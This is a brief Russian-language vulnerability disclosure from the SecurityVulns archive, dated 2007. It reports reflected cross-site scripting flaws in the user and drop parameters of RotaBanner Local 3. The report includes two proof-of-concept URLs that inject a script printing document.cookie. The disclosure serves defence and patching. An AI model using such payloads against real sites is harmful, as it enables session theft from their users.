Vulnerabilities in RotaBanner

2007-12-13T00:00:00
ID SECURITYVULNS:DOC:18625
Type securityvulns
Reporter Securityvulns
Modified 2007-12-13T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в баннерной системе RotaBanner.

Уязвимости в файле index.html в параметрах user и drop.

XSS:

http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уязвима версия RotaBanner Local 3 (и предыдущие).

Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/1442/

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua